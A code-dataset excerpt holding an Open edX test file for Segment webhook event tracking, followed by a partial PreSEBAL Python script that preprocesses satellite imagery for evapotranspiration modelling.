repo_name | path | copies | size | content | license
---|---|---|---|---|---
mbareta/edx-platform-ft | common/djangoapps/track/views/tests/test_segmentio.py | 11 | 22013 |
"""Ensure we can parse events sent to us from the Segment webhook integration"""
from datetime import datetime
import json
from ddt import ddt, data, unpack
from mock import sentinel
from nose.plugins.attrib import attr
from django.contrib.auth.models import User
from django.test.client import RequestFactory
from django.test.utils import override_settings
from openedx.core.lib.tests.assertions.events import assert_event_matches
from track.middleware import TrackMiddleware
from track.tests import EventTrackingTestCase
from track.views import segmentio
SECRET = 'anything'
ENDPOINT = '/segmentio/test/event'
USER_ID = 10
MOBILE_SHIM_PROCESSOR = [
{'ENGINE': 'track.shim.LegacyFieldMappingProcessor'},
{'ENGINE': 'track.shim.PrefixedEventProcessor'},
]
def expect_failure_with_message(message):
"""Ensure the test raises an exception and does not emit an event"""
def test_decorator(func):
def test_decorated(self, *args, **kwargs):
self.assertRaisesRegexp(segmentio.EventValidationError, message, func, self, *args, **kwargs)
self.assert_no_events_emitted()
return test_decorated
return test_decorator
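# Illustrative usage (mirrors the decorated tests below): wrapping a test with
# @expect_failure_with_message(segmentio.ERROR_MISSING_NAME) makes it pass only
# if the body raises segmentio.EventValidationError with that message and no
# event is emitted.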
@attr('shard_3')
@ddt
@override_settings(
TRACKING_SEGMENTIO_WEBHOOK_SECRET=SECRET,
TRACKING_IGNORE_URL_PATTERNS=[ENDPOINT],
TRACKING_SEGMENTIO_ALLOWED_TYPES=['track'],
TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES=['.bi.'],
TRACKING_SEGMENTIO_SOURCE_MAP={'test-app': 'mobile'},
EVENT_TRACKING_PROCESSORS=MOBILE_SHIM_PROCESSOR,
)
class SegmentIOTrackingTestCase(EventTrackingTestCase):
"""Test processing of Segment events"""
def setUp(self):
super(SegmentIOTrackingTestCase, self).setUp()
self.maxDiff = None # pylint: disable=invalid-name
self.request_factory = RequestFactory()
def test_get_request(self):
request = self.request_factory.get(ENDPOINT)
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 405)
self.assert_no_events_emitted()
@override_settings(
TRACKING_SEGMENTIO_WEBHOOK_SECRET=None
)
def test_no_secret_config(self):
request = self.request_factory.post(ENDPOINT)
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 401)
self.assert_no_events_emitted()
def test_no_secret_provided(self):
request = self.request_factory.post(ENDPOINT)
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 401)
self.assert_no_events_emitted()
def test_secret_mismatch(self):
request = self.create_request(key='y')
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 401)
self.assert_no_events_emitted()
def create_request(self, key=None, **kwargs):
"""Create a fake request that emulates a request from the Segment servers to ours"""
if key is None:
key = SECRET
request = self.request_factory.post(ENDPOINT + "?key=" + key, **kwargs)
if 'data' in kwargs:
request.json = json.loads(kwargs['data'])
return request
@data('Identify', 'Group', 'Alias', 'Page', 'identify', 'screen')
def test_segmentio_ignore_actions(self, action):
self.post_segmentio_event(action=action)
self.assert_no_events_emitted()
@data('edx.bi.some_name', 'EDX.BI.CAPITAL_NAME')
def test_segmentio_ignore_names(self, name):
self.post_segmentio_event(name=name)
self.assert_no_events_emitted()
def post_segmentio_event(self, **kwargs):
"""Post a fake Segment event to the view that processes it"""
request = self.create_request(
data=self.create_segmentio_event_json(**kwargs),
content_type='application/json'
)
segmentio.track_segmentio_event(request)
def create_segmentio_event(self, **kwargs):
"""Populate a fake Segment event with data of interest"""
action = kwargs.get('action', 'Track')
sample_event = {
"userId": kwargs.get('user_id', USER_ID),
"event": "Did something",
"properties": {
'name': kwargs.get('name', str(sentinel.name)),
'data': kwargs.get('data', {}),
'context': {
'course_id': kwargs.get('course_id') or '',
'app_name': 'edx.mobile.android',
}
},
"channel": 'server',
"context": {
"library": {
"name": kwargs.get('library_name', 'test-app'),
"version": "unknown"
},
"app": {
"version": "1.0.1",
},
'userAgent': str(sentinel.user_agent),
},
"receivedAt": "2014-08-27T16:33:39.100Z",
"timestamp": "2014-08-27T16:33:39.215Z",
"type": action.lower(),
"projectId": "u0j33yjkr8",
"messageId": "qy52hwp4",
"version": 2,
"integrations": {},
"options": {
"library": "unknown",
"providers": {}
},
"action": action
}
if 'context' in kwargs:
sample_event['properties']['context'].update(kwargs['context'])
return sample_event
def create_segmentio_event_json(self, **kwargs):
"""Return a json string containing a fake Segment event"""
return json.dumps(self.create_segmentio_event(**kwargs))
def test_segmentio_ignore_unknown_libraries(self):
self.post_segmentio_event(library_name='foo')
self.assert_no_events_emitted()
@expect_failure_with_message(segmentio.ERROR_USER_NOT_EXIST)
def test_no_user_for_user_id(self):
self.post_segmentio_event(user_id=40)
@expect_failure_with_message(segmentio.ERROR_INVALID_USER_ID)
def test_invalid_user_id(self):
self.post_segmentio_event(user_id='foobar')
@data('foo/bar/baz', 'course-v1:foo+bar+baz')
def test_success(self, course_id):
middleware = TrackMiddleware()
request = self.create_request(
data=self.create_segmentio_event_json(data={'foo': 'bar'}, course_id=course_id),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
middleware.process_request(request)
# The middleware normally emits an event, make sure it doesn't in this case.
self.assert_no_events_emitted()
try:
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 200)
expected_event = {
'accept_language': '',
'referer': '',
'username': str(sentinel.username),
'ip': '',
'session': '',
'event_source': 'mobile',
'event_type': str(sentinel.name),
'name': str(sentinel.name),
'event': {'foo': 'bar'},
'agent': str(sentinel.user_agent),
'page': None,
'time': datetime.strptime("2014-08-27T16:33:39.215Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
'host': 'testserver',
'context': {
'application': {
'name': 'edx.mobile.android',
'version': '1.0.1',
},
'user_id': USER_ID,
'course_id': course_id,
'org_id': u'foo',
'path': ENDPOINT,
'client': {
'library': {
'name': 'test-app',
'version': 'unknown'
},
'app': {
'version': '1.0.1',
},
},
'received_at': datetime.strptime("2014-08-27T16:33:39.100Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
},
}
finally:
middleware.process_response(request, None)
assert_event_matches(expected_event, self.get_event())
def test_invalid_course_id(self):
request = self.create_request(
data=self.create_segmentio_event_json(course_id='invalid'),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
segmentio.track_segmentio_event(request)
self.assert_events_emitted()
@expect_failure_with_message(segmentio.ERROR_MISSING_NAME)
def test_missing_name(self):
sample_event_raw = self.create_segmentio_event()
del sample_event_raw['properties']['name']
request = self.create_request(
data=json.dumps(sample_event_raw),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
segmentio.track_segmentio_event(request)
@expect_failure_with_message(segmentio.ERROR_MISSING_DATA)
def test_missing_data(self):
sample_event_raw = self.create_segmentio_event()
del sample_event_raw['properties']['data']
request = self.create_request(
data=json.dumps(sample_event_raw),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
segmentio.track_segmentio_event(request)
@expect_failure_with_message(segmentio.ERROR_MISSING_TIMESTAMP)
def test_missing_timestamp(self):
sample_event_raw = self.create_event_without_fields('timestamp')
request = self.create_request(
data=json.dumps(sample_event_raw),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
segmentio.track_segmentio_event(request)
@expect_failure_with_message(segmentio.ERROR_MISSING_RECEIVED_AT)
def test_missing_received_at(self):
sample_event_raw = self.create_event_without_fields('receivedAt')
request = self.create_request(
data=json.dumps(sample_event_raw),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
segmentio.track_segmentio_event(request)
def create_event_without_fields(self, *fields):
"""Create a fake event and remove some fields from it"""
event = self.create_segmentio_event()
for field in fields:
if field in event:
del event[field]
return event
def test_string_user_id(self):
User.objects.create(pk=USER_ID, username=str(sentinel.username))
self.post_segmentio_event(user_id=str(USER_ID))
self.assert_events_emitted()
def test_hiding_failure(self):
sample_event_raw = self.create_event_without_fields('timestamp')
request = self.create_request(
data=json.dumps(sample_event_raw),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 200)
self.assert_no_events_emitted()
@data(
('edx.video.played', 'play_video'),
('edx.video.paused', 'pause_video'),
('edx.video.stopped', 'stop_video'),
('edx.video.loaded', 'load_video'),
('edx.video.position.changed', 'seek_video'),
('edx.video.transcript.shown', 'show_transcript'),
('edx.video.transcript.hidden', 'hide_transcript'),
)
@unpack
def test_video_event(self, name, event_type):
course_id = 'foo/bar/baz'
middleware = TrackMiddleware()
input_payload = {
'current_time': 132.134456,
'module_id': 'i4x://foo/bar/baz/some_module',
'code': 'mobile'
}
if name == 'edx.video.loaded':
# We use the same input payload for all of these types of events, but the load video event is the only
# one that is not expected to contain a "current time" field, so we remove it from the input payload
# here.
del input_payload['current_time']
request = self.create_request(
data=self.create_segmentio_event_json(
name=name,
data=input_payload,
context={
'open_in_browser_url': 'https://testserver/courses/foo/bar/baz/courseware/Week_1/Activity/2',
'course_id': course_id,
'application': {
'name': 'edx.mobileapp.android',
'version': '29',
'component': 'videoplayer'
}
}),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
middleware.process_request(request)
try:
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 200)
expected_event = {
'accept_language': '',
'referer': '',
'username': str(sentinel.username),
'ip': '',
'session': '',
'event_source': 'mobile',
'event_type': event_type,
'name': name,
'agent': str(sentinel.user_agent),
'page': 'https://testserver/courses/foo/bar/baz/courseware/Week_1/Activity',
'time': datetime.strptime("2014-08-27T16:33:39.215Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
'host': 'testserver',
'context': {
'user_id': USER_ID,
'course_id': course_id,
'org_id': 'foo',
'path': ENDPOINT,
'client': {
'library': {
'name': 'test-app',
'version': 'unknown'
},
'app': {
'version': '1.0.1',
},
},
'application': {
'name': 'edx.mobileapp.android',
'version': '29',
'component': 'videoplayer'
},
'received_at': datetime.strptime("2014-08-27T16:33:39.100Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
},
'event': {
'currentTime': 132.134456,
'id': 'i4x-foo-bar-baz-some_module',
'code': 'mobile'
}
}
if name == 'edx.video.loaded':
# We use the same expected payload for all of these types of events, but the load video event is the
# only one that is not actually expected to contain a "current time" field. So we remove it from the
# expected event here.
del expected_event['event']['currentTime']
finally:
middleware.process_response(request, None)
actual_event = self.get_event()
assert_event_matches(expected_event, actual_event)
@data(
# Verify positive slide case. Verify slide to onSlideSeek. Verify
# edx.video.seeked emitted from iOS v1.0.02 is changed to
# edx.video.position.changed.
(1, 1, "seek_type", "slide", "onSlideSeek", "edx.video.seeked", "edx.video.position.changed", 'edx.mobileapp.iOS', '1.0.02'),
# Verify negative slide case. Verify slide to onSlideSeek. Verify
# edx.video.seeked to edx.video.position.changed.
(-2, -2, "seek_type", "slide", "onSlideSeek", "edx.video.seeked", "edx.video.position.changed", 'edx.mobileapp.iOS', '1.0.02'),
# Verify +30 is changed to -30 which is incorrectly emitted in iOS
# v1.0.02. Verify skip to onSkipSeek
(30, -30, "seek_type", "skip", "onSkipSeek", "edx.video.position.changed", "edx.video.position.changed", 'edx.mobileapp.iOS', '1.0.02'),
# Verify the correct case of -30 is also handled as well. Verify skip
# to onSkipSeek
(-30, -30, "seek_type", "skip", "onSkipSeek", "edx.video.position.changed", "edx.video.position.changed", 'edx.mobileapp.iOS', '1.0.02'),
# Verify positive slide case where onSkipSeek is changed to
# onSlideSeek. Verify edx.video.seeked emitted from Android v1.0.02 is
# changed to edx.video.position.changed.
(1, 1, "type", "onSkipSeek", "onSlideSeek", "edx.video.seeked", "edx.video.position.changed", 'edx.mobileapp.android', '1.0.02'),
# Verify negative slide case where onSkipSeek is changed to
# onSlideSeek. Verify edx.video.seeked emitted from Android v1.0.02 is
# changed to edx.video.position.changed.
(-2, -2, "type", "onSkipSeek", "onSlideSeek", "edx.video.seeked", "edx.video.position.changed", 'edx.mobileapp.android', '1.0.02'),
# Verify positive skip case where onSkipSeek is not changed and does
# not become negative.
(30, 30, "type", "onSkipSeek", "onSkipSeek", "edx.video.position.changed", "edx.video.position.changed", 'edx.mobileapp.android', '1.0.02'),
# Verify negative skip case where onSkipSeek is not changed.
(-30, -30, "type", "onSkipSeek", "onSkipSeek", "edx.video.position.changed", "edx.video.position.changed", 'edx.mobileapp.android', '1.0.02')
)
@unpack
def test_previous_builds(self,
requested_skip_interval,
expected_skip_interval,
seek_type_key,
seek_type,
expected_seek_type,
name,
expected_name,
platform,
version,
):
"""
Test backwards compatibility with previous app builds.
iOS version 1.0.02: incorrectly emits the skip back 30 seconds as +30
instead of -30.
Android version 1.0.02: skip and slide were both being returned as a
skip; skip or slide is determined by checking whether the skip time is == -30.
Additionally, for both of the above-mentioned versions, edx.video.seeked
was sent instead of edx.video.position.changed.
"""
course_id = 'foo/bar/baz'
middleware = TrackMiddleware()
input_payload = {
"code": "mobile",
"new_time": 89.699177437,
"old_time": 119.699177437,
seek_type_key: seek_type,
"requested_skip_interval": requested_skip_interval,
'module_id': 'i4x://foo/bar/baz/some_module',
}
request = self.create_request(
data=self.create_segmentio_event_json(
name=name,
data=input_payload,
context={
'open_in_browser_url': 'https://testserver/courses/foo/bar/baz/courseware/Week_1/Activity/2',
'course_id': course_id,
'application': {
'name': platform,
'version': version,
'component': 'videoplayer'
}
},
),
content_type='application/json'
)
User.objects.create(pk=USER_ID, username=str(sentinel.username))
middleware.process_request(request)
try:
response = segmentio.segmentio_event(request)
self.assertEquals(response.status_code, 200)
expected_event = {
'accept_language': '',
'referer': '',
'username': str(sentinel.username),
'ip': '',
'session': '',
'event_source': 'mobile',
'event_type': "seek_video",
'name': expected_name,
'agent': str(sentinel.user_agent),
'page': 'https://testserver/courses/foo/bar/baz/courseware/Week_1/Activity',
'time': datetime.strptime("2014-08-27T16:33:39.215Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
'host': 'testserver',
'context': {
'user_id': USER_ID,
'course_id': course_id,
'org_id': 'foo',
'path': ENDPOINT,
'client': {
'library': {
'name': 'test-app',
'version': 'unknown'
},
'app': {
'version': '1.0.1',
},
},
'application': {
'name': platform,
'version': version,
'component': 'videoplayer'
},
'received_at': datetime.strptime("2014-08-27T16:33:39.100Z", "%Y-%m-%dT%H:%M:%S.%fZ"),
},
'event': {
"code": "mobile",
"new_time": 89.699177437,
"old_time": 119.699177437,
"type": expected_seek_type,
"requested_skip_interval": expected_skip_interval,
'id': 'i4x-foo-bar-baz-some_module',
}
}
finally:
middleware.process_response(request, None)
actual_event = self.get_event()
assert_event_matches(expected_event, actual_event)
| agpl-3.0
wateraccounting/SEBAL | PreSEBAL/preSEBAL.py | 1 | 110216 |
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 08 15:09:49 2016
#test Github
@author: tih
"""
import numpy as np
import os
import scipy.interpolate
import gdal
from openpyxl import load_workbook
import osr
from datetime import datetime, timedelta
import pandas as pd
import shutil
import glob
from netCDF4 import Dataset
import warnings
import SEBAL.pySEBAL.pySEBAL_code as SEBAL
def main():
####################################################################################################################
############################################# CREATE INPUT FOR SEBAL RUN ###########################################
####################################################################################################################
####################################################################################################################
##################################################### PreHANTS ####################################################
####################################################################################################################
# PreHANTS
# Part 1: Define input by user
# Part 2: Set parameters and output folder
# Part 3: RUN SEBAL
# Part 4: HANTS
# Part 5: post HANTS
# Part 6: Write output
####################################################################################################################
################################################# PreHANTS part 1 ##################################################
####################################################################################################################
VegetationExcel = r"E:\Project_2\UAE\Excel\Excel_PreSEBAL_v1_0.xlsx" # This excel defines the p and c factor and vegetation height.
####################################################################################################################
################################################# PreHANTS part 2 ##################################################
####################################################################################################################
# Open Excel workbook used for Vegetation c and p factor conversions
wb_veg = load_workbook(VegetationExcel, data_only=True)
ws_veg = wb_veg['General_Input']
# Input for preSEBAL.py
start_date = "%s" %str(ws_veg['B2'].value)
end_date = "%s" %str(ws_veg['B3'].value)
inputExcel = r"%s" %str(ws_veg['B4'].value) # The excel with all the SEBAL input data
LU_data_FileName = r"%s" %str(ws_veg['B5'].value) # Path to Land Use map
output_folder = r"%s" %str(ws_veg['B7'].value)
# optional parameter
DSSF_Folder = r"%s" %str(ws_veg['B6'].value)
######################## Load Excels ##########################################
# Open Excel workbook for SEBAL inputs
wb = load_workbook(inputExcel, data_only=True)
# Get length of EXCEL sheet
ws = wb['General_Input']
ws2 = wb['VIIRS_PROBAV_Input']
endExcel=int(ws.max_row)
# Create Dict
SEBAL_RUNS = dict()
for number in range(2,endExcel+1):
input_folder_SEBAL = str(ws['B%d' % number].value)
output_folder_SEBAL = str(ws['C%d' % number].value)
Image_Type = int(ws['D%d' % number].value)
PROBA_V_name = str(ws2['D%d' % number].value)
VIIRS_name = str(ws2['B%d' % number].value)
SEBAL_RUNS[number] = {'input_folder': input_folder_SEBAL, 'output_folder': output_folder_SEBAL, 'image_type': Image_Type,'PROBA_V_name': PROBA_V_name,'VIIRS_name': VIIRS_name}
Kind_Of_Runs_Dict = {}
for k, v in SEBAL_RUNS.iteritems():
Kind_Of_Runs_Dict.setdefault(v['image_type'], []).append(k)
######################## Create output folders ##########################################
output_folder_PreSEBAL_SEBAL = os.path.join(output_folder,'PreSEBAL_SEBAL_out')
input_folder_HANTS = os.path.join(output_folder,'HANTS_in')
output_folder_PreSEBAL = os.path.join(output_folder,'PreSEBAL_out')
temp_folder_PreSEBAL = os.path.join(output_folder,'PreSEBAL_temp')
temp_folder_PreSEBAL_LST = os.path.join(temp_folder_PreSEBAL,'LST')
NDVI_outfolder = os.path.join(output_folder_PreSEBAL_SEBAL,'NDVI')
Albedo_outfolder = os.path.join(output_folder_PreSEBAL_SEBAL,'Albedo')
WaterMask_outfolder = os.path.join(output_folder_PreSEBAL_SEBAL,'Water_Mask')
LAI_outfolder = os.path.join(output_folder_PreSEBAL,'LAI')
ALBEDO_outfolder_end = os.path.join(output_folder_PreSEBAL,'ALBEDO')
NDVI_outfolder_end = os.path.join(output_folder_PreSEBAL,'NDVI')
WaterMask_outfolder_end = os.path.join(output_folder_PreSEBAL,'Water_Mask')
TRANS_outfolder = os.path.join(output_folder_PreSEBAL,'Transmissivity')
Surface_Temperature_outfolder = os.path.join(output_folder_PreSEBAL_SEBAL,'Surface_Temperature')
output_folder_HANTS_end_sharp = os.path.join(output_folder_PreSEBAL, 'LST_Sharpened')
output_folder_HANTS_end_Veg = os.path.join(output_folder_PreSEBAL, 'Vegetation_Height')
output_folder_p_factor = os.path.join(output_folder_PreSEBAL, 'p_factor')
output_folder_LUE = os.path.join(output_folder_PreSEBAL, 'LUE')
if not os.path.exists(output_folder_PreSEBAL_SEBAL):
os.makedirs(output_folder_PreSEBAL_SEBAL)
if not os.path.exists(output_folder_PreSEBAL):
os.mkdir(output_folder_PreSEBAL)
if not os.path.exists(temp_folder_PreSEBAL):
os.mkdir(temp_folder_PreSEBAL)
if not os.path.exists(NDVI_outfolder):
os.makedirs(NDVI_outfolder)
if not os.path.exists(Albedo_outfolder):
os.makedirs(Albedo_outfolder)
if not os.path.exists(WaterMask_outfolder):
os.makedirs(WaterMask_outfolder)
if not os.path.exists(LAI_outfolder):
os.makedirs(LAI_outfolder)
if not os.path.exists(ALBEDO_outfolder_end):
os.makedirs(ALBEDO_outfolder_end)
if not os.path.exists(NDVI_outfolder_end):
os.makedirs(NDVI_outfolder_end)
if not os.path.exists(WaterMask_outfolder_end):
os.makedirs(WaterMask_outfolder_end)
if not os.path.exists(temp_folder_PreSEBAL_LST):
os.makedirs(temp_folder_PreSEBAL_LST)
if not os.path.exists(Surface_Temperature_outfolder):
os.makedirs(Surface_Temperature_outfolder)
if not os.path.exists(TRANS_outfolder):
os.makedirs(TRANS_outfolder)
if not os.path.exists(output_folder_HANTS_end_sharp):
os.mkdir(output_folder_HANTS_end_sharp)
if not os.path.exists(output_folder_HANTS_end_Veg):
os.mkdir(output_folder_HANTS_end_Veg)
if not os.path.exists(output_folder_p_factor):
os.mkdir(output_folder_p_factor)
if not os.path.exists(output_folder_LUE):
os.mkdir(output_folder_LUE)
# Do not show warnings
warnings.filterwarnings('ignore')
####################################################################################################################
################################################### RUN SEBAL part 3 ###############################################
####################################################################################################################
############################## Define General info ############################
for number in Kind_Of_Runs_Dict[2]: # number defines the row of the inputExcel
print(number)
if not (SEBAL_RUNS[number]['PROBA_V_name'] == 'None' and SEBAL_RUNS[number]['VIIRS_name'] == 'None'):
Rp = 0.91 # Path radiance in the 10.4-12.5 µm band (W/m2/sr/µm)
tau_sky = 0.866 # Narrow band transmissivity of air, range: [10.4-12.5 µm]
surf_temp_offset = 3 # Surface temperature offset for water
######################## Open General info from SEBAL Excel ###################
# Open the General_Input sheet
ws = wb['General_Input']
# Extract the input and output folder, and Image type from the excel file
input_folder = str(ws['B%d' % number].value)
Image_Type = int(2) # Type of Image (1 = Landsat, 2 = VIIRS & PROBA-V)
# Extract the Path to the DEM map from the excel file
DEM_fileName = '%s' %str(ws['E%d' % number].value) #'DEM_HydroShed_m'
# Open DEM and create Latitude and longitude files
lat,lon,lat_fileName,lon_fileName=SEBAL.DEM_lat_lon(DEM_fileName, temp_folder_PreSEBAL)
######################## Extract general data for Landsat ##########################################
if Image_Type == 1:
# Open the Landsat_Input sheet
ws = wb['Landsat_Input']
# Extract Landsat name, number and amount of thermal bands from excel file
Name_Landsat_Image = str(ws['B%d' % number].value) # From glovis.usgs.gov
Landsat_nr = int(ws['C%d' % number].value) # Type of Landsat (LS) image used (LS5, LS7, or LS8)
Bands_thermal = int(ws['D%d' %number].value) # Number of LS bands used to retrieve the land surface temperature
# Pixel size of the model
pixel_spacing=int(30)
# the path to the MTL file of landsat
Landsat_meta_fileName = os.path.join(input_folder, '%s_MTL.txt' % Name_Landsat_Image)
# Read the general info from the MTL file (times are in Greenwich Mean Time)
year, DOY, hour, minutes, UTM_Zone, Sun_elevation = SEBAL.info_general_metadata(Landsat_meta_fileName) # call definition info_general_metadata
date=datetime.strptime('%s %s'%(year,DOY), '%Y %j')
month = date.month
day = date.day
# define the kind of sensor and resolution of the sensor
sensor1 = 'L%d' % Landsat_nr
sensor2 = 'L%d' % Landsat_nr
sensor3 = 'L%d' % Landsat_nr
res1 = '30m'
res2 = '%sm' %int(pixel_spacing)
res3 = '30m'
# Set the start parameter for determining transmissivity at 0
Determine_transmissivity = 0
######################## Extract general data for VIIRS-PROBAV ##########################################
if Image_Type == 2:
# Open the VIIRS_PROBAV_Input sheet
ws = wb['VIIRS_PROBAV_Input']
# Extract the name of the thermal and quality VIIRS image from the excel file
Name_VIIRS_Image_TB = '%s' %str(ws['B%d' % number].value)
# Extract the name to the PROBA-V image from the excel file
Name_PROBAV_Image = '%s' %str(ws['D%d' % number].value) # Must be a tiff file
# Pixel size of the model
pixel_spacing=int(100)
# UTM Zone of the end results
UTM_Zone = float(ws['G%d' % number].value)
if not Name_VIIRS_Image_TB == 'None':
#Get time from the VIIRS dataset name (IMPORTANT TO KEEP THE TEMPLATE OF THE VIIRS NAME CORRECT example: VIIRS_SVI05_npp_d20161021_t0956294_e1002080_b25822_c20161021160209495952_noaa_ops.tif)
Total_Day_VIIRS = Name_VIIRS_Image_TB.split('_')[3]
Total_Time_VIIRS = Name_VIIRS_Image_TB.split('_')[4]
# Get the information out of the VIIRS name in GMT (Greenwich time)
year = int(Total_Day_VIIRS[1:5])
month = int(Total_Day_VIIRS[5:7])
day = int(Total_Day_VIIRS[7:9])
Startdate = '%d-%02d-%02d' % (year,month,day)
DOY=datetime.strptime(Startdate,'%Y-%m-%d').timetuple().tm_yday
hour = int(Total_Time_VIIRS[1:3])
minutes = int(Total_Time_VIIRS[3:5])
# If this ran correctly, the transmissivity can be determined
ws = wb['Meteo_Input']
Field_Radiation_24 = '%s' %str(ws['J%d' % number].value)
Field_Trans_24 = '%s' %str(ws['K%d' % number].value)
Determine_transmissivity = 1
# otherwise use the PROBA-V day, but then no transmissivity can be determined for now
else:
# Get the day and time from the PROBA-V
Band_PROBAVhdf_fileName = os.path.join(input_folder, '%s.HDF5' % (Name_PROBAV_Image))
g=gdal.Open(Band_PROBAVhdf_fileName, gdal.GA_ReadOnly)
Meta_data = g.GetMetadata()
Date_PROBAV = str(Meta_data['LEVEL3_RADIOMETRY_BLUE_OBSERVATION_START_DATE'])
year = int(Date_PROBAV.split("-")[0])
month = int(Date_PROBAV.split("-")[1])
day = int(Date_PROBAV.split("-")[2])
Var_name = '%d%02d%02d' %(year, month, day)
DOY=datetime.strptime(Var_name,'%Y%m%d').timetuple().tm_yday
# We cannot determine transmissivity
Determine_transmissivity = 0
# Determine the transmissivity if possible (Determine_transmissivity = 1)
if Determine_transmissivity == 1:
# Rounded difference of the local time from Greenwich (GMT) (hours):
delta_GTM = round(np.sign(lon[int(np.shape(lon)[0]/2), int(np.shape(lon)[1]/2)]) * lon[int(np.shape(lon)[0]/2), int(np.shape(lon)[1]/2)] * 24 / 360)
if np.isnan(delta_GTM):
# Fall back on the mean longitude when the centre pixel is NaN
delta_GTM = round(np.sign(np.nanmean(lon)) * np.nanmean(lon) * 24 / 360)
# Calculate local time
hour += delta_GTM
if hour < 0.0:
day -= 1
hour += 24
if hour >= 24:
day += 1
hour -= 24
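# Worked example (illustrative): for a scene centred at ~55 degrees east,
# delta_GTM = round(55 * 24 / 360) = round(3.67) = 4, so an image stamped
# 23:30 GMT becomes 03:30 local time on the following day (the hour wraps
# past 24 and the day is incremented).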
# define the kind of sensor and resolution of the sensor
sensor1 = 'PROBAV'
sensor2 = 'VIIRS'
res1 = '375m'
res2 = '%sm' %int(pixel_spacing)
res3 = '30m'
######################## Extract general data from DEM file and create Slope map ##########################################
# Variable date name
Var_name = '%d%02d%02d' %(year, month, day)
# Reproject from the geographic coordinate system to UTM -
# 1) DEM - the original DEM coordinates are geographic: lat, lon
dest, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset(
DEM_fileName, pixel_spacing, UTM_Zone=UTM_Zone)
band = dest.GetRasterBand(1) # Get the reprojected dem band
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
# Read out the DEM band and print the DEM properties
data_DEM = band.ReadAsArray(0, 0, ncol, nrow)
# 2) Latitude file - reprojection
# reproject latitude to the landsat projection and save as tiff file
lat_rep, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset(
lat_fileName, pixel_spacing, UTM_Zone=UTM_Zone)
# Get the reprojected latitude data
lat_proy = lat_rep.GetRasterBand(1).ReadAsArray(0, 0, ncol, nrow)
# 3) Longitude file - reprojection
# reproject longitude to the landsat projection and save as tiff file
lon_rep, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset(lon_fileName, pixel_spacing, UTM_Zone=UTM_Zone)
# Get the reprojected longitude data
lon_proy = lon_rep.GetRasterBand(1).ReadAsArray(0, 0, ncol, nrow)
lon_fileName = os.path.join(temp_folder_PreSEBAL,'lon_resh.tif')
SEBAL.save_GeoTiff_proy(dest, lon_proy, lon_fileName, shape, nband=1)
# Calculate slope and aspect from the reprojected DEM
deg2rad,rad2deg,slope,aspect=SEBAL.Calc_Gradient(data_DEM, pixel_spacing)
if Determine_transmissivity == 1:
# calculate the cos zenith angle
Ra_mountain_24, Ra_inst, cos_zn_resh, dr, phi, delta = SEBAL.Calc_Ra_Mountain(lon,DOY,hour,minutes,lon_proy,lat_proy,slope,aspect)
cos_zn_fileName = os.path.join(temp_folder_PreSEBAL,'cos_zn.tif')
SEBAL.save_GeoTiff_proy(dest, cos_zn_resh, cos_zn_fileName, shape, nband=1)
# Save the Ra
Ra_inst_fileName = os.path.join(temp_folder_PreSEBAL,'Ra_inst.tif')
SEBAL.save_GeoTiff_proy(dest, Ra_inst, Ra_inst_fileName, shape, nband=1)
Ra_mountain_24_fileName = os.path.join(temp_folder_PreSEBAL,'Ra_mountain_24.tif')
SEBAL.save_GeoTiff_proy(dest, Ra_mountain_24, Ra_mountain_24_fileName, shape, nband=1)
#################### Calculate Transmissivity ##########################################
# Open the General_Input sheet
ws = wb['Meteo_Input']
# Extract the method radiation value
Value_Method_Radiation_inst = '%s' %str(ws['L%d' % number].value)
# Values to check if data is created
Check_Trans_inst = 0
Check_Trans_24 = 0
''' This is now turned off, so you need to fill in the instantaneous transmissivity or radiation
# Extract the data to the method of radiation
if int(Value_Method_Radiation_inst) == 2:
Field_Radiation_inst = '%s' %str(ws['N%d' % number].value)
if Field_Radiation_inst == 'None':
# Instantanious Transmissivity files must be created
Check_Trans_inst = 1
# Calculate Transmissivity
quarters_hours = np.ceil(minutes/30.) * 30
hours_GMT = hour - delta_GTM
if quarters_hours >= 60:
hours_GMT += 1
quarters_hours = 0
# Define the instantanious LANDSAF file
name_Landsaf_inst = 'HDF5_LSASAF_MSG_DSSF_MSG-Disk_%d%02d%02d%02d%02d.tif' %(year, month,day, hours_GMT, quarters_hours)
file_Landsaf_inst = os.path.join(DSSF_Folder,name_Landsaf_inst)
# Reproject the Ra_inst data to match the LANDSAF data
Ra_inst_3Km_dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Ra_inst_fileName, file_Landsaf_inst, method = 1)
Ra_inst_3Km = Ra_inst_3Km_dest.GetRasterBand(1).ReadAsArray()
Ra_inst_3Km[Ra_inst_3Km==0] = np.nan
# Open the Rs LANDSAF data
dest_Rs_inst_3Km = gdal.Open(file_Landsaf_inst)
Rs_inst_3Km = dest_Rs_inst_3Km.GetRasterBand(1).ReadAsArray()
Rs_inst_3Km = np.float_(Rs_inst_3Km)/10
